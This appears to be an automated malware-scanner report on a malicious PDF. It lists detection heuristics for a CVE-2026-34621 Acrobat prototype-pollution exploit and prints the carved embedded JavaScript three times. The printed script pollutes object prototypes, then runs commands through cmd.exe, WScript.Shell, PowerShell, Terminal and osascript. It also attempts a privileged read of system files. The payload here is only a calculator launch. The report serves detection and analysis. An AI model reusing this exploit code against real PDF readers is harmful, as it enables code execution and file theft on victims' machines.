MALICIOUS
266
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 9
-
Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related critical CVE likely CVE_2026_34621_RELATEDPDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
-
JavaScript action low 3 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Prototype-pollution JavaScript pattern high PDF_JS_PROTOTYPE_POLLUTIONPDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCHEmbedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.Matched line in script
app.launchURL('https://www.example.com', true); -
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
app.launchURL with file/cmd/UNC target high PDF_FOXIT_LAUNCHURLPDF JavaScript invokes app.launchURL() with a file://, cmd:, or UNC target — Foxit and Adobe handle these schemes inconsistently and they have been used for code execution and NTLM credential theft. (matched in decompressed stream)
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.example.com Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x15 | 3656 bytes |
SHA-256: 73bd8bb28f1b022183d104ee8d0902207cea470411f7f12b7893aa2728880bca |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 9 shell/COM execution token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
(function _ehefxwprm() {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-22T17:04:16.940459
// === Prototype Pollution (CVE-2026-34621) ===
try {
Object.prototype.__defineGetter__('__trusted', function() { return true; });
Object.prototype.constructor.prototype.bypass = true;
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
} catch(e) {}
// === OS Detection ===
var os = 'unknown';
try {
if (typeof app !== 'undefined' && app.platform) {
var pf = app.platform.toLowerCase();
if (pf.indexOf('win') >= 0) os = 'windows';
else if (pf.indexOf('mac') >= 0) os = 'macos';
}
if (os === 'unknown' && typeof navigator !== 'undefined') {
var ua = navigator.userAgent.toLowerCase();
if (ua.indexOf('windows') >= 0) os = 'windows';
else if (ua.indexOf('mac') >= 0) os = 'macos';
else if (ua.indexOf('android') >= 0) os = 'android';
else if (ua.indexOf('iphone') >= 0 || ua.indexOf('ipad') >= 0) os = 'ios';
}
// Adobe-specific mobile detection
if (typeof app !== 'undefined' && app.viewerType) {
if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) os = 'android'; // or ios
}
} catch(e) {}
// === OS-Specific Execution ===
try {
if (os === 'windows') {
// Method 1: app.launchURL with cmd.exe
try {
app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent("calc.exe"), true);
} catch(e1) {}
// Method 2: ActiveX WScript.Shell
try {
var shell = new ActiveXObject('WScript.Shell');
shell.Run("calc.exe", 0, false);
} catch(e2) {}
// Method 3: PowerShell direct
try {
var shell = new ActiveXObject('WScript.Shell');
shell.Run("powershell -Command "calc.exe"", 0, false);
} catch(e3) {}
} else if (os === 'macos') {
// Method 1: Terminal via file://
try {
app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("open /System/Applications/Calculator.app"), true);
} catch(e1) {}
// Method 2: osascript
try {
var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"';
app.launchURL('osascript://' + encodeURIComponent(script));
} catch(e2) {}
} else {
// Mobile platforms: demo fallback (not vulnerable)
try {
app.launchURL('https://www.example.com', true);
app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.');
} catch(e) {}
}
} catch(mainErr) {}
// Additional trigger: attempt privileged file read to escalate context
try {
if (typeof util !== 'undefined' && util.readFileIntoStream) {
var path = (os === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts';
util.readFileIntoStream({cDIPath: path, bEncodeBase64: true});
}
} catch(e) {}
})();
|
|||
javascript_obj0006_001.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x15 | 3797 bytes |
SHA-256: e27d0a193dcc02693f4533fc2b3656bfa130a9955db868c0c254a841f8eefd4d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 9 shell/COM execution token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
<< /JS (
\(function _ehefxwprm\(\) {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-22T17:04:16.940459
// === Prototype Pollution \(CVE-2026-34621\) ===
try {
Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\);
Object.prototype.constructor.prototype.bypass = true;
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
} catch\(e\) {}
// === OS Detection ===
var os = 'unknown';
try {
if \(typeof app !== 'undefined' && app.platform\) {
var pf = app.platform.toLowerCase\(\);
if \(pf.indexOf\('win'\) >= 0\) os = 'windows';
else if \(pf.indexOf\('mac'\) >= 0\) os = 'macos';
}
if \(os === 'unknown' && typeof navigator !== 'undefined'\) {
var ua = navigator.userAgent.toLowerCase\(\);
if \(ua.indexOf\('windows'\) >= 0\) os = 'windows';
else if \(ua.indexOf\('mac'\) >= 0\) os = 'macos';
else if \(ua.indexOf\('android'\) >= 0\) os = 'android';
else if \(ua.indexOf\('iphone'\) >= 0 || ua.indexOf\('ipad'\) >= 0\) os = 'ios';
}
// Adobe-specific mobile detection
if \(typeof app !== 'undefined' && app.viewerType\) {
if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) os = 'android'; // or ios
}
} catch\(e\) {}
// === OS-Specific Execution ===
try {
if \(os === 'windows'\) {
// Method 1: app.launchURL with cmd.exe
try {
app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\("calc.exe"\), true\);
} catch\(e1\) {}
// Method 2: ActiveX WScript.Shell
try {
var shell = new ActiveXObject\('WScript.Shell'\);
shell.Run\("calc.exe", 0, false\);
} catch\(e2\) {}
// Method 3: PowerShell direct
try {
var shell = new ActiveXObject\('WScript.Shell'\);
shell.Run\("powershell -Command "calc.exe"", 0, false\);
} catch\(e3\) {}
} else if \(os === 'macos'\) {
// Method 1: Terminal via file://
try {
app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\("open /System/Applications/Calculator.app"\), true\);
} catch\(e1\) {}
// Method 2: osascript
try {
var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"';
app.launchURL\('osascript://' + encodeURIComponent\(script\)\);
} catch\(e2\) {}
} else {
// Mobile platforms: demo fallback \(not vulnerable\)
try {
app.launchURL\('https://www.example.com', true\);
app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\);
} catch\(e\) {}
}
} catch\(mainErr\) {}
// Additional trigger: attempt privileged file read to escalate context
try {
if \(typeof util !== 'undefined' && util.readFileIntoStream\) {
var path = \(os === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts';
util.readFileIntoStream\({cDIPath: path, bEncodeBase64: true}\);
}
} catch\(e\) {}
}\)\(\);
) /S /JavaScript >>
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x15 | 7454 bytes |
SHA-256: 8364a4c68c02b5b5689c037bb3b72720804aff1db67f7caa36d4d696a09837cb |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 18 shell/COM execution token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
(function _ehefxwprm() {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-22T17:04:16.940459
// === Prototype Pollution (CVE-2026-34621) ===
try {
Object.prototype.__defineGetter__('__trusted', function() { return true; });
Object.prototype.constructor.prototype.bypass = true;
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
} catch(e) {}
// === OS Detection ===
var os = 'unknown';
try {
if (typeof app !== 'undefined' && app.platform) {
var pf = app.platform.toLowerCase();
if (pf.indexOf('win') >= 0) os = 'windows';
else if (pf.indexOf('mac') >= 0) os = 'macos';
}
if (os === 'unknown' && typeof navigator !== 'undefined') {
var ua = navigator.userAgent.toLowerCase();
if (ua.indexOf('windows') >= 0) os = 'windows';
else if (ua.indexOf('mac') >= 0) os = 'macos';
else if (ua.indexOf('android') >= 0) os = 'android';
else if (ua.indexOf('iphone') >= 0 || ua.indexOf('ipad') >= 0) os = 'ios';
}
// Adobe-specific mobile detection
if (typeof app !== 'undefined' && app.viewerType) {
if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) os = 'android'; // or ios
}
} catch(e) {}
// === OS-Specific Execution ===
try {
if (os === 'windows') {
// Method 1: app.launchURL with cmd.exe
try {
app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent("calc.exe"), true);
} catch(e1) {}
// Method 2: ActiveX WScript.Shell
try {
var shell = new ActiveXObject('WScript.Shell');
shell.Run("calc.exe", 0, false);
} catch(e2) {}
// Method 3: PowerShell direct
try {
var shell = new ActiveXObject('WScript.Shell');
shell.Run("powershell -Command "calc.exe"", 0, false);
} catch(e3) {}
} else if (os === 'macos') {
// Method 1: Terminal via file://
try {
app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("open /System/Applications/Calculator.app"), true);
} catch(e1) {}
// Method 2: osascript
try {
var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"';
app.launchURL('osascript://' + encodeURIComponent(script));
} catch(e2) {}
} else {
// Mobile platforms: demo fallback (not vulnerable)
try {
app.launchURL('https://www.example.com', true);
app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.');
} catch(e) {}
}
} catch(mainErr) {}
// Additional trigger: attempt privileged file read to escalate context
try {
if (typeof util !== 'undefined' && util.readFileIntoStream) {
var path = (os === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts';
util.readFileIntoStream({cDIPath: path, bEncodeBase64: true});
}
} catch(e) {}
})();
<< /JS (
\(function _ehefxwprm\(\) {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-22T17:04:16.940459
// === Prototype Pollution \(CVE-2026-34621\) ===
try {
Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\);
Object.prototype.constructor.prototype.bypass = true;
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
} catch\(e\) {}
// === OS Detection ===
var os = 'unknown';
try {
if \(typeof app !== 'undefined' && app.platform\) {
var pf = app.platform.toLowerCase\(\);
if \(pf.indexOf\('win'\) >= 0\) os = 'windows';
else if \(pf.indexOf\('mac'\) >= 0\) os = 'macos';
}
if \(os === 'unknown' && typeof navigator !== 'undefined'\) {
var ua = navigator.userAgent.toLowerCase\(\);
if \(ua.indexOf\('windows'\) >= 0\) os = 'windows';
else if \(ua.indexOf\('mac'\) >= 0\) os = 'macos';
else if \(ua.indexOf\('android'\) >= 0\) os = 'android';
else if \(ua.indexOf\('iphone'\) >= 0 || ua.indexOf\('ipad'\) >= 0\) os = 'ios';
}
// Adobe-specific mobile detection
if \(typeof app !== 'undefined' && app.viewerType\) {
if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) os = 'android'; // or ios
}
} catch\(e\) {}
// === OS-Specific Execution ===
try {
if \(os === 'windows'\) {
// Method 1: app.launchURL with cmd.exe
try {
app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\("calc.exe"\), true\);
} catch\(e1\) {}
// Method 2: ActiveX WScript.Shell
try {
var shell = new ActiveXObject\('WScript.Shell'\);
shell.Run\("calc.exe", 0, false\);
} catch\(e2\) {}
// Method 3: PowerShell direct
try {
var shell = new ActiveXObject\('WScript.Shell'\);
shell.Run\("powershell -Command "calc.exe"", 0, false\);
} catch\(e3\) {}
} else if \(os === 'macos'\) {
// Method 1: Terminal via file://
try {
app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\("open /System/Applications/Calculator.app"\), true\);
} catch\(e1\) {}
// Method 2: osascript
try {
var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"';
app.launchURL\('osascript://' + encodeURIComponent\(script\)\);
} catch\(e2\) {}
} else {
// Mobile platforms: demo fallback \(not vulnerable\)
try {
app.launchURL\('https://www.example.com', true\);
app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\);
} catch\(e\) {}
}
} catch\(mainErr\) {}
// Additional trigger: attempt privileged file read to escalate context
try {
if \(typeof util !== 'undefined' && util.readFileIntoStream\) {
var path = \(os === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts';
util.readFileIntoStream\({cDIPath: path, bEncodeBase64: true}\);
}
} catch\(e\) {}
}\)\(\);
) /S /JavaScript >>
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.